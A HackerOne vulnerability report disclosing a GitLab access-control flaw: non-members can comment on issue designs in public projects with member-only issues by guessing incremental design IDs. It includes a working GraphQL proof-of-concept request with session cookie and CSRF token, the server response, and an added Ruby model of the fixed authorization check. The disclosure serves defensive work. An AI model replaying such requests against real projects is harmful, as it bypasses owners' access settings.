Non Project Member of Public Project Can Comment and Reply to Issue Design Even if "Only Project Members" Set for Issues in Settings
HackerOne report #678986 by rafiem on 2019-08-22, assigned to estrike:
Hi Team,
I have found an improper access control issue on issue designs in public projects. There is a new feature in issues that enables users to upload design images to a specific issue. Anyone who has read access to the issue can then comment and reply to a design image in the issue. But in the case of public projects that set "Only Project Members" for Issues in settings, non-project members are still able to comment and reply to a specific design of an issue. Because the "Design ID" is incremental and easy to guess, an attacker can easily iterate the "Design ID" number; another attack case is that the attacker was previously a member of the project and saved all the design IDs of issues in the project.
Proof of Concept
1.) In case user A has a public project that enabled "Only Project Members" for Issues in the settings
2.) In one of the issues, user A uploads a design and the design has an ID of "162"
3.) The attacker can then iterate the ID to comment on any issue in a public project that enabled "Only Project Members", or the attacker was previously a project member and saved the design ID
4.) Request performed by attacker:
POST /api/graphql HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 1139
accept: */*
Origin: https://gitlab.com
X-CSRF-Token: qIqkC6CRpfKUXSOqiYaKes6quuFYkkLBEpwZBXG1AzK7zdX50niBVRl/5x7xB6Pb3i786K6OL6vbyI75YxoRgQ==
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
content-type: application/json
Referer: https://gitlab.com/bajigur/cuk1/issues/10/designs/user_wall.png
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: sidebar_collapsed=false; _biz_uid=ea1b7c6c852741a1b91c529230ca6360; _mkto_trk=id:194-VVC-221&token:_mch-gitlab.com-1561483345548-60566; _ga=GA1.2.1915876956.1561483347; _fbp=fb.1.1561483346763.1551130490; vid=acec44df-0d42-4f26-9ce8-964c785c893f; event_filter=all; _gid=GA1.2.315320630.1566358252; _gitlab_session=88e87632b979666cb39f91edd74bb5bf; _hjid=bbb97822-c8f1-4731-91ad-87c5ab0219dc; _biz_flagsA=%7B%22Version%22%3A1%2C%22XDomain%22%3A%221%22%2C%22Mkto%22%3A%221%22%2C%22Frm%22%3A%221%22%7D; _biz_nA=46; _biz_pendingA=%5B%5D; frequently_used_emojis=thumbsdown
[{"operationName":"createImageDiffNote","variables":{"input":{"noteableId":"gid://gitlab/DesignManagement::Design/162","body":"BRAND NEW MESSAGE !","position":{"headSha":"asd","baseSha":"asd","startSha":"asd","x":1,"y":1,"width":1,"height":100,"paths":{"newPath":"asd"}}}},"query":"mutation createImageDiffNote($input: CreateImageDiffNoteInput!) {\n createImageDiffNote(input: $input) {\n note {\n ...DesignNote\n discussion {\n id\n replyId\n notes {\n edges {\n node {\n ...DesignNote\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment DesignNote on Note {\n id\n author {\n avatarUrl\n name\n username\n webUrl\n __typename\n }\n body\n bodyHtml\n createdAt\n position {\n diffRefs {\n ...DesignDiffRefs\n __typename\n }\n x\n y\n height\n width\n __typename\n }\n __typename\n}\n\nfragment DesignDiffRefs on DiffRefs {\n baseSha\n startSha\n headSha\n __typename\n}\n"}]
Note that the attacker doesn't need to specify the correct position and newPath of the design; in the example the value is "asd".
5.) Response received:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Aug 2019 00:33:30 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 90
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS
Access-Control-Allow-Origin: https://gitlab.com
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page
Access-Control-Max-Age: 1728000
Cache-Control: max-age=0, private, must-revalidate, no-store
Etag: W/"124339246668e4ec9bff1f954ae2f02e"
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Vary: Origin
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: yc5uR9G0zP1
X-Runtime: 0.174266
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin
RateLimit-Limit: 600
RateLimit-Observed: 2
RateLimit-Remaining: 598
RateLimit-Reset: 1566434070
RateLimit-ResetTime: Thu, 22 Aug 2019 00:34:30 GMT
[{"data":{"createImageDiffNote":{"note":null,"__typename":"CreateImageDiffNotePayload"}}}]
6.) User A then checks the targeted design and can view the attacker's comment on the design issue
PoC video attached
Impact
Non-project members can comment and reply to designs in public projects that enabled "Only Project Members" for Issues
Best Regards,
@rafiem
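The authorization gap the report describes, modelled as an added Ruby example (this is not GitLab's code and does not use GitLab's models): a note on a design must require the same read access as the parent issue under the project's "Issues" visibility setting, rather than only checking that the project itself is public. The struct classes, the `ISSUES_*` constants, the two checks and the fixture (user A, an outsider, design ID 162) are all constructed stand-ins. The flawed check is kept beside the hardened one so the difference is visible on the report's own scenario.

```ruby
# Added example, not GitLab's code: models the authorization a
# "create note on design" mutation must perform. Every class, constant
# and fixture below is a constructed stand-in.

Project = Struct.new(:public_project, :issues_access_level, :members, keyword_init: true)
Issue   = Struct.new(:project, keyword_init: true)
Design  = Struct.new(:id, :issue, keyword_init: true)
User    = Struct.new(:name, keyword_init: true)

# Hypothetical names for the "Issues" visibility setting of a project.
ISSUES_DISABLED = :disabled
ISSUES_PRIVATE  = :private   # "Only Project Members"
ISSUES_ENABLED  = :enabled   # everyone who can see the project

def project_member?(user, project)
  project.members.include?(user)
end

# Read access to a project's issues under the project-level setting. This is
# the check the report says the design-note path skipped: in a public project
# with issues set to "Only Project Members", non-members have no read access.
def can_read_issues?(user, project)
  case project.issues_access_level
  when ISSUES_DISABLED then false
  when ISSUES_PRIVATE  then project_member?(user, project)
  when ISSUES_ENABLED  then project.public_project || project_member?(user, project)
  else false
  end
end

# Flawed check: only asks whether the project itself is visible, so any
# signed-in user can comment on a design in a public project.
def can_note_on_design_flawed?(user, design)
  project = design.issue.project
  project.public_project || project_member?(user, project)
end

# Hardened check: a design belongs to an issue, so a note on it requires the
# same read access as the issue.
def can_note_on_design?(user, design)
  can_read_issues?(user, design.issue.project)
end

# Mutation handler stand-in. The design is looked up by its incremental id;
# an unknown id and an unauthorized id produce the same "note: nil" result,
# so the id sequence cannot be used to confirm which designs exist.
def create_image_diff_note(designs, user, design_id, body)
  design = designs[design_id]
  if design.nil? || !can_note_on_design?(user, design)
    return { note: nil, errors: ["design not found or not accessible"] }
  end
  { note: { author: user.name, body: body, design_id: design.id }, errors: [] }
end

# Constructed fixture matching the report's scenario.
MEMBER   = User.new(name: "userA")
OUTSIDER = User.new(name: "outsider")
PROJECT  = Project.new(public_project: true, issues_access_level: ISSUES_PRIVATE, members: [MEMBER])
DESIGN   = Design.new(id: 162, issue: Issue.new(project: PROJECT))
DESIGNS  = { 162 => DESIGN }

if __FILE__ == $PROGRAM_NAME
  p create_image_diff_note(DESIGNS, OUTSIDER, 162, "BRAND NEW MESSAGE !")
  p create_image_diff_note(DESIGNS, MEMBER, 162, "looks good")
end
```

Running the file shows the outsider's request returning `note: nil` while the member's succeeds. The design choice worth keeping from this is that the design's permission is derived from the issue's permission rather than duplicated: if the project's Issues setting changes, the design path follows it automatically.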
Attachments